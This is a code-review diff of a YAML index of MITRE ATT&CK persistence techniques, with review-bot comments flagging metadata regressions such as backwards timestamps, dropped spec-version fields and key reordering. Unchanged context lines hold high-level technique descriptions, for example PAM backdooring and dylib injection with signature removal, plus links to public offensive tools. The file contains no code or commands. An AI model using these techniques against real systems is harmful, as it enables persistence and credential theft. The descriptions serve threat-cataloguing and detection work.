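Review bot: the `modified` timestamp for T1205.002 moves backwards (2022-11-08 → 2022-10-20), and the same happens to T1133 (2023-05-09 → 2023-03-30) and T1546.006 (2022-05-11 → 2022-04-20) later in the patch, while every other entry moves forward into 2024. A regenerated object cannot normally be older than it was, so either the generator now reads `modified` from a different STIX source or these three were previously stamped with a bundle date; please confirm which before merging.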
@@ -27444,7 +27836,6 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1037:
technique:
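Review bot: T1205.002 drops `spec_version: '2.1'` but keeps `x_mitre_attack_spec_version: 2.1.0`, unlike the neighbouring entries that are bumped to 3.2.0 in the same pass. If the upstream object is genuinely still at 2.1.0 this is expected; otherwise, together with the backwards `modified` date above, it suggests this entry was not refreshed from the same dataset.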
@@ -27509,49 +27900,10 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1556.003:
technique:
- x_mitre_platforms:
- - Linux
- - macOS
- x_mitre_domains:
- - enterprise-attack
- x_mitre_contributors:
- - Scott Knight, @sdotknight, VMware Carbon Black
- - George Allen, VMware Carbon Black
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--06c00069-771a-4d57-8ef5-d3718c1a8771
- type: attack-pattern
- created: '2020-06-26T04:01:09.648Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1556.003
- url: https://attack.mitre.org/techniques/T1556/003
- - source_name: Apple PAM
- url: https://opensource.apple.com/source/dovecot/dovecot-239/dovecot/doc/wiki/PasswordDatabase.PAM.txt
- description: Apple. (2011, May 11). PAM - Pluggable Authentication Modules.
- Retrieved June 25, 2020.
- - source_name: Man Pam_Unix
- url: https://linux.die.net/man/8/pam_unix
- description: die.net. (n.d.). pam_unix(8) - Linux man page. Retrieved June
- 25, 2020.
- - source_name: Red Hat PAM
- url: https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/6/html/managing_smart_cards/pluggable_authentication_modules
- description: Red Hat. (n.d.). CHAPTER 2. USING PLUGGABLE AUTHENTICATION MODULES
- (PAM). Retrieved June 25, 2020.
- - source_name: PAM Backdoor
- url: https://github.com/zephrax/linux-pam-backdoor
- description: zephrax. (2018, August 3). linux-pam-backdoor. Retrieved June
- 25, 2020.
- - source_name: PAM Creds
- url: https://x-c3ll.github.io/posts/PAM-backdoor-DNS/
- description: Fernández, J. M. (2018, June 27). Exfiltrating credentials via
- PAM backdoors & DNS requests. Retrieved June 26, 2020.
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2024-08-21T16:19:55.082Z'
name: 'Modify Authentication Process: Pluggable Authentication Modules'
description: |-
Adversaries may modify pluggable authentication modules (PAM) to access user credentials or enable otherwise unwarranted access to accounts. PAM is a modular system of configuration files, libraries, and executable files which guide authentication for many services. The most common authentication module is pam_unix.so
, which retrieves, sets, and verifies account authentication information in /etc/passwd
and /etc/shadow
.(Citation: Apple PAM)(Citation: Man Pam_Unix)(Citation: Red Hat PAM)
@@ -27566,20 +27918,57 @@ persistence:
phase_name: defense-evasion
- kill_chain_name: mitre-attack
phase_name: persistence
+ x_mitre_contributors:
+ - Scott Knight, @sdotknight, VMware Carbon Black
+ - George Allen, VMware Carbon Black
+ x_mitre_deprecated: false
x_mitre_detection: |-
Monitor PAM configuration and module paths (ex: /etc/pam.d/
) for changes. Use system-integrity tools such as AIDE and monitoring tools such as auditd to monitor PAM files.
Look for suspicious account behavior across systems that share accounts, either user, admin, or service accounts. Examples: one account logged into multiple systems simultaneously; multiple accounts logged into the same machine simultaneously; accounts logged in at odd times (ex: when the user is not present) or outside of business hours. Activity may be from interactive login sessions or process ownership from accounts being used to execute binaries on a remote system as a particular account. Correlate other security systems with login information (e.g., a user has an active login session but has not entered the building or does not have VPN access).
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '2.0'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ x_mitre_version: '2.1'
x_mitre_data_sources:
- 'File: File Modification'
- 'Logon Session: Logon Session Creation'
- x_mitre_permissions_required:
- - root
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--06c00069-771a-4d57-8ef5-d3718c1a8771
+ created: '2020-06-26T04:01:09.648Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1556/003
+ external_id: T1556.003
+ - source_name: Apple PAM
+ description: Apple. (2011, May 11). PAM - Pluggable Authentication Modules.
+ Retrieved June 25, 2020.
+ url: https://opensource.apple.com/source/dovecot/dovecot-239/dovecot/doc/wiki/PasswordDatabase.PAM.txt
+ - source_name: Man Pam_Unix
+ description: die.net. (n.d.). pam_unix(8) - Linux man page. Retrieved June
+ 25, 2020.
+ url: https://linux.die.net/man/8/pam_unix
+ - source_name: PAM Creds
+ description: Fernández, J. M. (2018, June 27). Exfiltrating credentials via
+ PAM backdoors & DNS requests. Retrieved June 26, 2020.
+ url: https://x-c3ll.github.io/posts/PAM-backdoor-DNS/
+ - source_name: Red Hat PAM
+ description: Red Hat. (n.d.). CHAPTER 2. USING PLUGGABLE AUTHENTICATION MODULES
+ (PAM). Retrieved June 25, 2020.
+ url: https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/6/html/managing_smart_cards/pluggable_authentication_modules
+ - source_name: PAM Backdoor
+ description: zephrax. (2018, August 3). linux-pam-backdoor. Retrieved June
+ 25, 2020.
+ url: https://github.com/zephrax/linux-pam-backdoor
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1556.003
atomic_tests: []
T1574.007:
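Review bot: the T1556.003 external_references block is purely reordered (`PAM Creds` now precedes `Red Hat PAM`, and `description` moves above `url` in each entry); the five sources and their URLs are identical to the removed block, so no reference is lost. The only content changes are `x_mitre_version` 2.0 → 2.1 and the removal of `x_mitre_permissions_required: - root`; the description lines in this hunk are untouched context, so the version bump must come from an upstream change not visible here.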
@@ -27669,7 +28058,6 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1546.013:
technique:
@@ -27757,7 +28145,6 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1546.013
atomic_tests: []
T1543:
@@ -27842,11 +28229,10 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1133:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-03-30T21:01:36.318Z'
name: External Remote Services
description: |-
Adversaries may leverage external-facing remote services to initially access and/or persist within a network. Remote services such as VPNs, Citrix, and other access mechanisms allow users to connect to internal enterprise network resources from external locations. There are often remote service gateways that manage connections and credential authentication for these services. Services such as [Windows Remote Management](https://attack.mitre.org/techniques/T1021/006) and [VNC](https://attack.mitre.org/techniques/T1021/005) can also be used externally.(Citation: MacOS VNC software for Remote Desktop)
@@ -27924,7 +28310,6 @@ persistence:
url: https://www.trendmicro.com/en_us/research/20/f/xorddos-kaiji-botnet-malware-variants-target-exposed-docker-servers.html
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- spec_version: '2.1'
identifier: T1133
atomic_tests: []
T1546.006:
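Review bot: for T1133 the lines before `identifier: T1133` go straight from `object_marking_refs` to `identifier` once `spec_version` is removed, whereas every other entry in this patch has `x_mitre_attack_spec_version` and `x_mitre_modified_by_ref` at that position. They may sit earlier in the object, but please confirm the T1133 entry still carries them.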
@@ -27957,7 +28342,7 @@ persistence:
Adversaries may establish persistence by executing malicious content triggered by the execution of tainted binaries. Mach-O binaries have a series of headers that are used to perform certain operations when a binary is loaded. The LC_LOAD_DYLIB header in a Mach-O binary tells macOS and OS X which dynamic libraries (dylibs) to load during execution time. These can be added ad-hoc to the compiled binary as long as adjustments are made to the rest of the fields and dependencies.(Citation: Writing Bad Malware for OSX) There are tools available to perform these changes.
Adversaries may modify Mach-O binary headers to load and execute malicious dylibs every time the binary is executed. Although any changes will invalidate digital signatures on binaries because the binary is being modified, this can be remediated by simply removing the LC_CODE_SIGNATURE command from the binary so that the signature isn’t checked at load time.(Citation: Malware Persistence on OS X)
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-04-20T17:08:21.101Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: LC_LOAD_DYLIB Addition
x_mitre_detection: Monitor processes for those that may be used to modify binary
@@ -27980,11 +28365,10 @@ persistence:
- User
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1053.007:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2024-10-15T16:26:03.731Z'
name: Kubernetes Cronjob
description: |-
Adversaries may abuse task scheduling functionality provided by container orchestration tools such as Kubernetes to schedule deployment of containers configured to execute malicious code. Container orchestration jobs run these automated tasks at a specific date and time, similar to cron jobs on a Linux system. Deployments of this type can also be configured to maintain a quantity of containers over time, automating the process of maintaining persistence within a cluster.
@@ -28042,9 +28426,8 @@ persistence:
url: https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1053.007
atomic_tests: []
T1542.001:
@@ -28125,12 +28508,11 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1542.001
atomic_tests: []
T1574.011:
technique:
- modified: '2023-10-31T14:00:00.188Z'
+ modified: '2024-09-12T19:42:48.016Z'
name: 'Hijack Execution Flow: Services Registry Permissions Weakness'
description: |-
Adversaries may execute their own malicious payloads by hijacking the Registry entries used by services. Adversaries may use flaws in the permissions for Registry keys related to services to redirect from the originally specified executable to one that they control, in order to launch their own code when a service starts. Windows stores local service configuration information in the Registry under HKLM\SYSTEM\CurrentControlSet\Services
. The information stored under a service's Registry keys can be manipulated to modify a service's execution parameters through tools such as the service controller, sc.exe, [PowerShell](https://attack.mitre.org/techniques/T1059/001), or [Reg](https://attack.mitre.org/software/S0075). Access to Registry keys is controlled through access control lists and user permissions. (Citation: Registry Key Security)(Citation: malware_hides_service)
@@ -28149,7 +28531,6 @@ persistence:
phase_name: privilege-escalation
- kill_chain_name: mitre-attack
phase_name: defense-evasion
- x_mitre_attack_spec_version: 2.1.0
x_mitre_contributors:
- Travis Smith, Tripwire
- Matthew Demaske, Adaptforward
@@ -28163,7 +28544,6 @@ persistence:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
x_mitre_version: '1.1'
@@ -28190,8 +28570,8 @@ persistence:
external_id: T1574.011
- source_name: Tweet Registry Perms Weakness
description: "@r0wdy_. (2017, November 30). Service Recovery Parameters. Retrieved
- April 9, 2018."
- url: https://twitter.com/r0wdy_/status/936365549553991680
+ September 12, 2024."
+ url: https://x.com/r0wdy_/status/936365549553991680
- source_name: insecure_reg_perms
description: Clément Labro. (2020, November 12). Windows RpcEptMapper Service
Insecure Registry Permissions EoP. Retrieved August 25, 2021.
@@ -28222,7 +28602,8 @@ persistence:
url: https://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/troj_zegost
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- spec_version: '2.1'
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1574.011
atomic_tests: []
T1542.003:
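Review bot: the net change for T1574.011 is `x_mitre_attack_spec_version` 2.1.0 to 3.2.0 plus the drop of `spec_version`, but it is spread over three hunks because the key order changed: `x_mitre_attack_spec_version` and `x_mitre_modified_by_ref` are removed near the top of the object and re-added here at the bottom. Having the generator emit keys in a stable (or sorted) order would keep future diffs to the lines that actually changed.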
@@ -28279,11 +28660,10 @@ persistence:
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
- spec_version: '2.1'
atomic_tests: []
T1547:
technique:
- modified: '2024-04-16T12:26:07.945Z'
+ modified: '2024-09-12T15:27:58.051Z'
name: Boot or Logon Autostart Execution
description: |-
Adversaries may configure system settings to automatically execute a program during system boot or logon to maintain persistence or gain higher-level privileges on compromised systems. Operating systems may have mechanisms for automatically running a program on system boot or account logon.(Citation: Microsoft Run Key)(Citation: MSDN Authentication Packages)(Citation: Microsoft TimeProvider)(Citation: Cylance Reg Persistence Sept 2013)(Citation: Linux Kernel Programming) These mechanisms may include automatically executing programs that are placed in specially designated directories or are referenced by repositories that store configuration information, such as the Windows Registry. An adversary may achieve the same goal by modifying or extending features of the kernel.
@@ -28355,9 +28735,9 @@ persistence:
2017.
url: https://msdn.microsoft.com/library/windows/desktop/aa374733.aspx
- source_name: Microsoft Run Key
- description: Microsoft. (n.d.). Run and RunOnce Registry Keys. Retrieved November
- 12, 2014.
- url: http://msdn.microsoft.com/en-us/library/aa376977
+ description: Microsoft. (n.d.). Run and RunOnce Registry Keys. Retrieved September
+ 12, 2024.
+ url: https://learn.microsoft.com/en-us/windows/win32/setupapi/run-and-runonce-registry-keys
- source_name: Microsoft TimeProvider
description: Microsoft. (n.d.). Time Provider. Retrieved March 26, 2018.
url: https://msdn.microsoft.com/library/windows/desktop/ms725475.aspx
@@ -28373,12 +28753,11 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1547
atomic_tests: []
T1547.014:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-03-22T14:17:17.353Z'
name: Active Setup
description: |-
Adversaries may achieve persistence by adding a Registry key to the Active Setup of the local machine. Active Setup is a Windows mechanism that is used to execute programs when a user logs in. The value stored in the Registry key will be executed after a user logs into the computer.(Citation: Klein Active Setup 2010) These programs will be executed under the context of the user and will have the account's associated permissions level.
@@ -28453,7 +28832,6 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1547.014
atomic_tests: []
T1542.005:
@@ -28496,7 +28874,7 @@ persistence:
url: https://tools.cisco.com/security/center/resources/integrity_assurance.html#26
description: Cisco. (n.d.). Cisco IOS Software Integrity Assurance - Boot
Information. Retrieved October 21, 2020.
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2020-10-22T16:35:53.806Z'
name: TFTP Boot
description: |-
Adversaries may abuse netbooting to load an unauthorized network device operating system from a Trivial File Transfer Protocol (TFTP) server. TFTP boot (netbooting) is commonly used by network administrators to load configuration-controlled network device images from a centralized management server. Netbooting is one option in the boot sequence and can be used to centralize, manage, and control device images.
@@ -28520,8 +28898,6 @@ persistence:
- 'Firmware: Firmware Modification'
x_mitre_permissions_required:
- Administrator
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1543.003:
technique:
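Review bot: for T1542.005 both `spec_version` and `x_mitre_attack_spec_version: 2.1.0` are removed and, unlike T1574.011 above, no `x_mitre_attack_spec_version` is added back anywhere in this object's hunks; the same holds for T1505.002 further down. Together with the `modified` date on T1542.005 moving back to 2020, this looks like the object was taken from an older STIX source; check that these two objects still carry an attack spec version after regeneration.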
@@ -28676,31 +29052,11 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1543.003
atomic_tests: []
T1053.003:
technique:
- x_mitre_platforms:
- - Linux
- - macOS
- x_mitre_domains:
- - enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--2acf44aa-542f-4366-b4eb-55ef5747759c
- type: attack-pattern
- created: '2019-12-03T14:25:00.538Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1053.003
- url: https://attack.mitre.org/techniques/T1053/003
- - source_name: 20 macOS Common Tools and Techniques
- url: https://labs.sentinelone.com/20-common-tools-techniques-used-by-macos-threat-actors-malware/
- description: Phil Stokes. (2021, February 16). 20 Common Tools & Techniques
- Used by macOS Threat Actors & Malware. Retrieved August 23, 2021.
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2024-10-15T18:45:51.945Z'
name: 'Scheduled Task/Job: Cron'
description: "Adversaries may abuse the cron
utility to perform
task scheduling for initial or recurring execution of malicious code.(Citation:
@@ -28717,6 +29073,7 @@ persistence:
phase_name: persistence
- kill_chain_name: mitre-attack
phase_name: privilege-escalation
+ x_mitre_deprecated: false
x_mitre_detection: "Monitor scheduled task creation from common utilities using
command-line invocation. Legitimate scheduled tasks may be created during
installation of new software or through system administration functions. Look
@@ -28727,9 +29084,13 @@ persistence:
part of a chain of behavior that could lead to other activities, such as network
connections made for Command and Control, learning details about the environment
through Discovery, and Lateral Movement. "
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '1.1'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ x_mitre_version: '1.2'
x_mitre_data_sources:
- 'File: File Modification'
- 'Process: Process Creation'
@@ -28737,17 +29098,37 @@ persistence:
- 'Command: Command Execution'
x_mitre_permissions_required:
- User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ x_mitre_remote_support: false
+ type: attack-pattern
+ id: attack-pattern--2acf44aa-542f-4366-b4eb-55ef5747759c
+ created: '2019-12-03T14:25:00.538Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1053/003
+ external_id: T1053.003
+ - source_name: 20 macOS Common Tools and Techniques
+ description: Phil Stokes. (2021, February 16). 20 Common Tools & Techniques
+ Used by macOS Threat Actors & Malware. Retrieved August 23, 2021.
+ url: https://labs.sentinelone.com/20-common-tools-techniques-used-by-macos-threat-actors-malware/
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1053.003
atomic_tests: []
T1137:
technique:
- x_mitre_platforms:
- - Windows
- - Office 365
- x_mitre_domains:
- - enterprise-attack
+ modified: '2024-10-15T16:01:21.255Z'
+ name: Office Application Startup
+ description: |-
+ Adversaries may leverage Microsoft Office-based applications for persistence between startups. Microsoft Office is a fairly common application suite on Windows-based operating systems within an enterprise network. There are multiple mechanisms that can be used with Office for persistence when an Office-based application is started; this can include the use of Office Template Macros and add-ins.
+
+ A variety of features have been discovered in Outlook that can be abused to obtain persistence, such as Outlook rules, forms, and Home Page.(Citation: SensePost Ruler GitHub) These persistence mechanisms can work within Outlook or be used through Office 365.(Citation: TechNet O365 Outlook Rules)
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: persistence
x_mitre_contributors:
- Nick Carr, Mandiant
- Microsoft Threat Intelligence Center (MSTIC)
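Review bot: the T1053.003 object is deleted and re-added almost wholesale because of key reordering; the substantive changes are `x_mitre_version` 1.1 to 1.2, `x_mitre_attack_spec_version` 3.2.0, and the new `revoked`, `x_mitre_deprecated` and `x_mitre_remote_support` flags, while the description and detection text are untouched. Sorting keys in the generator would reduce this to those five lines.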
@@ -28755,79 +29136,73 @@ persistence:
- Praetorian
- Loic Jaquemet
- Ricardo Dias
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--2c4d4e92-0ccf-4a97-b54c-86d662988a53
+ x_mitre_deprecated: false
+ x_mitre_detection: |-
+ Collect process execution information including process IDs (PID) and parent process IDs (PPID) and look for abnormal chains of activity resulting from Office processes. Non-standard process execution trees may also indicate suspicious or malicious behavior. If winword.exe is the parent process for suspicious processes and activity relating to other adversarial techniques, then it could indicate that the application was used maliciously.
+
+ Many Office-related persistence mechanisms require changes to the Registry and for binaries, files, or scripts to be written to disk or existing files modified to include malicious scripts. Collect events related to Registry key creation and modification for keys that could be used for Office-based persistence.(Citation: CrowdStrike Outlook Forms)(Citation: Outlook Today Home Page)
+
+ Microsoft has released a PowerShell script to safely gather mail forwarding rules and custom forms in your mail environment as well as steps to interpret the output.(Citation: Microsoft Detect Outlook Forms) SensePost, whose tool [Ruler](https://attack.mitre.org/software/S0358) can be used to carry out malicious rules, forms, and Home Page attacks, has released a tool to detect Ruler usage.(Citation: SensePost NotRuler)
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: false
+ x_mitre_platforms:
+ - Windows
+ - Office Suite
+ x_mitre_version: '1.4'
+ x_mitre_data_sources:
+ - 'File: File Creation'
+ - 'Application Log: Application Log Content'
+ - 'Windows Registry: Windows Registry Key Modification'
+ - 'File: File Modification'
+ - 'Module: Module Load'
+ - 'Process: Process Creation'
+ - 'Windows Registry: Windows Registry Key Creation'
+ - 'Command: Command Execution'
type: attack-pattern
+ id: attack-pattern--2c4d4e92-0ccf-4a97-b54c-86d662988a53
created: '2017-12-14T16:46:06.044Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
external_references:
- source_name: mitre-attack
- external_id: T1137
url: https://attack.mitre.org/techniques/T1137
- - source_name: SensePost Ruler GitHub
- url: https://github.com/sensepost/ruler
- description: 'SensePost. (2016, August 18). Ruler: A tool to abuse Exchange
- services. Retrieved February 4, 2019.'
+ external_id: T1137
+ - source_name: Microsoft Detect Outlook Forms
+ description: Fox, C., Vangel, D. (2018, April 22). Detect and Remediate Outlook
+ Rules and Custom Forms Injections Attacks in Office 365. Retrieved February
+ 4, 2019.
+ url: https://docs.microsoft.com/en-us/office365/securitycompliance/detect-and-remediate-outlook-rules-forms-attack
- source_name: TechNet O365 Outlook Rules
- url: https://blogs.technet.microsoft.com/office365security/defending-against-rules-and-forms-injection/
description: Koeller, B.. (2018, February 21). Defending Against Rules and
Forms Injection. Retrieved November 5, 2019.
+ url: https://blogs.technet.microsoft.com/office365security/defending-against-rules-and-forms-injection/
- source_name: CrowdStrike Outlook Forms
- url: https://malware.news/t/using-outlook-forms-for-lateral-movement-and-persistence/13746
description: Parisi, T., et al. (2017, July). Using Outlook Forms for Lateral
Movement and Persistence. Retrieved February 5, 2019.
- - source_name: Outlook Today Home Page
- url: https://medium.com/@bwtech789/outlook-today-homepage-persistence-33ea9b505943
- description: Soutcast. (2018, September 14). Outlook Today Homepage Persistence.
- Retrieved February 5, 2019.
- - source_name: Microsoft Detect Outlook Forms
- url: https://docs.microsoft.com/en-us/office365/securitycompliance/detect-and-remediate-outlook-rules-forms-attack
- description: Fox, C., Vangel, D. (2018, April 22). Detect and Remediate Outlook
- Rules and Custom Forms Injections Attacks in Office 365. Retrieved February
- 4, 2019.
+ url: https://malware.news/t/using-outlook-forms-for-lateral-movement-and-persistence/13746
+ - source_name: SensePost Ruler GitHub
+ description: 'SensePost. (2016, August 18). Ruler: A tool to abuse Exchange
+ services. Retrieved February 4, 2019.'
+ url: https://github.com/sensepost/ruler
- source_name: SensePost NotRuler
- url: https://github.com/sensepost/notruler
description: SensePost. (2017, September 21). NotRuler - The opposite of Ruler,
provides blue teams with the ability to detect Ruler usage against Exchange.
Retrieved February 4, 2019.
- modified: '2022-04-25T14:00:00.188Z'
- name: Office Application Startup
- description: |-
- Adversaries may leverage Microsoft Office-based applications for persistence between startups. Microsoft Office is a fairly common application suite on Windows-based operating systems within an enterprise network. There are multiple mechanisms that can be used with Office for persistence when an Office-based application is started; this can include the use of Office Template Macros and add-ins.
-
- A variety of features have been discovered in Outlook that can be abused to obtain persistence, such as Outlook rules, forms, and Home Page.(Citation: SensePost Ruler GitHub) These persistence mechanisms can work within Outlook or be used through Office 365.(Citation: TechNet O365 Outlook Rules)
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: persistence
- x_mitre_detection: |-
- Collect process execution information including process IDs (PID) and parent process IDs (PPID) and look for abnormal chains of activity resulting from Office processes. Non-standard process execution trees may also indicate suspicious or malicious behavior. If winword.exe is the parent process for suspicious processes and activity relating to other adversarial techniques, then it could indicate that the application was used maliciously.
-
- Many Office-related persistence mechanisms require changes to the Registry and for binaries, files, or scripts to be written to disk or existing files modified to include malicious scripts. Collect events related to Registry key creation and modification for keys that could be used for Office-based persistence.(Citation: CrowdStrike Outlook Forms)(Citation: Outlook Today Home Page)
-
- Microsoft has released a PowerShell script to safely gather mail forwarding rules and custom forms in your mail environment as well as steps to interpret the output.(Citation: Microsoft Detect Outlook Forms) SensePost, whose tool [Ruler](https://attack.mitre.org/software/S0358) can be used to carry out malicious rules, forms, and Home Page attacks, has released a tool to detect Ruler usage.(Citation: SensePost NotRuler)
- x_mitre_version: '1.3'
+ url: https://github.com/sensepost/notruler
+ - source_name: Outlook Today Home Page
+ description: Soutcast. (2018, September 14). Outlook Today Homepage Persistence.
+ Retrieved February 5, 2019.
+ url: https://medium.com/@bwtech789/outlook-today-homepage-persistence-33ea9b505943
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- x_mitre_data_sources:
- - 'File: File Creation'
- - 'Application Log: Application Log Content'
- - 'Windows Registry: Windows Registry Key Modification'
- - 'File: File Modification'
- - 'Module: Module Load'
- - 'Process: Process Creation'
- - 'Windows Registry: Windows Registry Key Creation'
- - 'Command: Command Execution'
- x_mitre_permissions_required:
- - User
- - Administrator
- x_mitre_is_subtechnique: false
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1137
atomic_tests: []
T1098.003:
technique:
- modified: '2024-03-29T18:29:06.873Z'
+ modified: '2024-10-14T22:11:30.271Z'
name: 'Account Manipulation: Additional Cloud Roles'
description: "An adversary may add additional roles or permissions to an adversary-controlled
cloud account to maintain persistent access to a tenant. For example, adversaries
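Review bot: T1137 loses `x_mitre_permissions_required` (User, Administrator) with no replacement, and its platform list changes from `Office 365` to `Office Suite`; `x_mitre_version` goes 1.3 to 1.4 while the description and detection text are unchanged. The same two changes recur for T1137.006 below. Call out the dropped permissions field in the PR description, and if anything downstream groups or filters techniques by platform name, it needs the new `Office Suite` label.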
@@ -28857,6 +29232,7 @@ persistence:
phase_name: persistence
- kill_chain_name: mitre-attack
phase_name: privilege-escalation
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Microsoft Threat Intelligence Center (MSTIC)
- Alex Parsons, Crowdstrike
@@ -28867,6 +29243,7 @@ persistence:
- Praetorian
- Alex Soler, AttackIQ
- Arad Inbar, Fidelis Security
+ - Arun Seelagan, CISA
x_mitre_deprecated: false
x_mitre_detection: 'Collect activity logs from IAM services and cloud administrator
accounts to identify unusual activity in the assignment of roles to those
@@ -28875,13 +29252,13 @@ persistence:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- - Office 365
- IaaS
- SaaS
- - Google Workspace
- - Azure AD
- x_mitre_version: '2.4'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '2.5'
x_mitre_data_sources:
- 'User Account: User Account Modification'
type: attack-pattern
